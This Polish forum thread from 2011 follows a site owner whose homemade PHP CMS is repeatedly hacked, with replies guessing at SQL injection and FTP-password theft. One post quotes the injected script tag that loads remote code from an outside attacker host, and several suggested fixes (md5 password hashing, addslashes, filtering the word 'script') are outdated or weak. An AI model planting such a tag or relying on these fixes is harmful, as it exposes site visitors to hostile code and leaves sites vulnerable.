![]() |
![]() ![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 92 Pomógł: 0 Dołączył: 6.05.2009 Skąd: warszawa Ostrzeżenie: (0%) ![]() ![]() |
Jak to możliwe że ktoś umieścił swoje pliki na moim serwerze bez dostępu do ftp?
|
|
|
![]()
Post
#2
|
|
![]() Grupa: Zarejestrowani Postów: 749 Pomógł: 37 Dołączył: 3.10.2006 Ostrzeżenie: (0%) ![]() ![]() |
Może jakiś trojan? Lub też błędy w skryptach php. Niestety zbyt mało szczegółów dzieki którym można by było coś stwierdzić...
-------------------- |
|
|
![]()
Post
#3
|
|
Grupa: Zarejestrowani Postów: 92 Pomógł: 0 Dołączył: 6.05.2009 Skąd: warszawa Ostrzeżenie: (0%) ![]() ![]() |
A jakiego typu mogą to być błędy w skryptach php?
|
|
|
![]()
Post
#4
|
|
![]() Grupa: Zarejestrowani Postów: 728 Pomógł: 76 Dołączył: 12.06.2009 Ostrzeżenie: (0%) ![]() ![]() |
Używasz totalcommander ? Jeśli tak to zmień wszystkie hasła, przeskanuj pliki na serwerze (najlepiej po dacie) w poszukiwaniu niecnego kodu JavaScript a na sam koniec przestań używać TC.
-------------------- gry flash online
Dobry hosting i tanie odnowienia domen firma: masternet. Zarabianie bez wysiłku na domenach bez ruchu: prolink. |
|
|
![]()
Post
#5
|
|
Grupa: Zarejestrowani Postów: 92 Pomógł: 0 Dołączył: 6.05.2009 Skąd: warszawa Ostrzeżenie: (0%) ![]() ![]() |
Teraz zauważyłam ze to przekierowanie występuje tylko wtedy gdy łączę się z bazą..
![]() Używam CyberDuck a nie TC. Ten post edytował AniaR 9.02.2011, 14:58:27 |
|
|
![]()
Post
#6
|
|
![]() Grupa: Zarejestrowani Postów: 255 Pomógł: 23 Dołączył: 1.12.2003 Ostrzeżenie: (10%) ![]() ![]() |
Dziurawy skrypt zatem, podrzucili Ci jakiś kod do strony po prostu w ten sposób.
-------------------- Tani hosting - Hekko.pl | PHP 5.2/5.3/5.4/5.5/5.6 | MySQL 5.5 |
Hosting już od 49 zł rocznie! Domena pl do każdego pakietu! |
|
|
![]()
Post
#7
|
|
Grupa: Zarejestrowani Postów: 92 Pomógł: 0 Dołączył: 6.05.2009 Skąd: warszawa Ostrzeżenie: (0%) ![]() ![]() |
Skrypty hakujące zostały dodane jako kolejne rekordy w bazie a nie dopisane do plików php na serwerze. Usunęłam je z bazy, zmieniłam hasła do ftpa do bazy i do panelu admina i było ok ale nie minęło parę godzin i znowu strona zhakowana.. Tym razem coś innego: usunięte pliki z serwera i podmienione na inne. Wiem ze to moja wina bo nie odpowiednio zabezpieczyłam stronę. Będę to teraz robiła w następujących krokach:
1. Login i hasło do admina przechowywałam w bazie w postaci jawnej (zmienię na md5) 2. Linki na stronie mija postać: ?cos=cos&cos2=cos2 itd.. (zamienię na /cos/cos2 itd dodając plik .htacess) 3. Zamienię logowanie z $_SERVER["PHP_AUTH_USER"] na normalne (formularz z metoda post) 4. Zabezpieczę zmienne przesyłane w panelu metoda post dodając przed każda funkcje addslashes() (na stronie nie ma formularza który łączy się z bazą, jedynie w panelu) Może powinnam zrobić coś jeszcze? Np. zmienić nazwę katalogu w którym trzymam panel z "admin" na jakiś mniej domyślny? Proszę o sugestie.. |
|
|
![]()
Post
#8
|
|
![]() Grupa: Administratorzy Postów: 1 552 Pomógł: 211 Dołączył: 7.07.2009 Skąd: NJ ![]() |
Nie wiem jak wygląda Twoja "strona", z jakich skryptów korzystasz, czy jest to jakiś autorski system CMS itd. Zamiana nazwy katalogu z domyślnego na inny, ma sens ale tylko w określonych przypadkach
![]() |
|
|
![]()
Post
#9
|
|
Grupa: Zarejestrowani Postów: 92 Pomógł: 0 Dołączył: 6.05.2009 Skąd: warszawa Ostrzeżenie: (0%) ![]() ![]() |
Autorski cms..
Skorzystam z rady przeniesienia pliku w którym łączę się z bazą poza katalog w którym trzymam wszystkie pliki strony. Może jeszcze jakieś sugestie? Ten post edytował AniaR 10.02.2011, 14:21:58 |
|
|
![]()
Post
#10
|
|
![]() Grupa: Zarejestrowani Postów: 728 Pomógł: 76 Dołączył: 12.06.2009 Ostrzeżenie: (0%) ![]() ![]() |
Może to atak typu SQL Injection
2. To akurat tylko kwestia kosmetyczna bo haker i tak może dowolnie manipulować wysyłanym nagłówkiem 4. Może spróbuj tak. I pózniej filtrujesz dane POST przesyłane z formularza tą funkcją.
-------------------- gry flash online
Dobry hosting i tanie odnowienia domen firma: masternet. Zarabianie bez wysiłku na domenach bez ruchu: prolink. |
|
|
![]()
Post
#11
|
|
Grupa: Zarejestrowani Postów: 92 Pomógł: 0 Dołączył: 6.05.2009 Skąd: warszawa Ostrzeżenie: (0%) ![]() ![]() |
Haker wchodzi mi do panelu admina i dodaje do bazy jako kolejny rekord w tabeli taką teść:
<script src="http://www.manja.byethost6.com/balikita/noxss.php"></script> Ten skrypt umieszczony w bazie już dalej robi swoje i zamiast wyswietlac strony wyswietla jakies gowno!! Niestety funkcja czyszcząca clean ktora podałeś nie zabezpiecza przed wpisanie ma bazy ciagu znaków w postaci: <script src="http://www.manja.byethost6.com/balikita/noxss.php"></script> Zrobię sprawdzenie, ze jeżeli w ciągu znaków jest słowo script to ma nie przepościć... A moze jest jakis inny sposob walidacji tego? |
|
|
![]()
Post
#12
|
|
![]() Grupa: Zarejestrowani Postów: 1 495 Pomógł: 245 Dołączył: 1.07.2009 Skąd: Bydgoszcz Ostrzeżenie: (0%) ![]() ![]() |
Przeleć dane z formularza funkcją strip_tags zanim wrzucisz do bazy czy cokolwiek innego z nimi zrobisz.
Używasz totalcommander ? Jeśli tak to zmień wszystkie hasła, przeskanuj pliki na serwerze (najlepiej po dacie) w poszukiwaniu niecnego kodu JavaScript a na sam koniec przestań używać TC. A co jest nie tak z TotalCommanderem?
Ten post edytował sadistic_son 10.02.2011, 19:19:56 -------------------- Uśpieni przez system, wychowani przez media,
Karmieni zmysłami, próżnymi żądzami... -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Jesteś zbyt leniwy, żeby się zarejestrować? Ja jestem zbyt leniwy aby Ci pomóc! -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- |
|
|
![]()
Post
#13
|
|
![]() Grupa: Administratorzy Postów: 1 552 Pomógł: 211 Dołączył: 7.07.2009 Skąd: NJ ![]() |
@sadistic_son - nic, jeżeli nie przechowuje się w nim zapisanych haseł
![]() |
|
|
![]()
Post
#14
|
|
![]() Grupa: Zarejestrowani Postów: 255 Pomógł: 23 Dołączył: 1.12.2003 Ostrzeżenie: (10%) ![]() ![]() |
A co jest nie tak z TotalCommanderem? Dosyć popularny problem ostatnimi czasy w pewnych wersjach TC. Znam to z autopsji klientów. Nieszyfrowane hasła łatwo odczytane przez trojany. Aczkolwiek, zwykle to boty potem się logują i dodają do indexu dane. -------------------- Tani hosting - Hekko.pl | PHP 5.2/5.3/5.4/5.5/5.6 | MySQL 5.5 |
Hosting już od 49 zł rocznie! Domena pl do każdego pakietu! |
|
|
![]() ![]() |
![]() |
Wersja Lo-Fi | Aktualny czas: 14.08.2025 - 12:18 |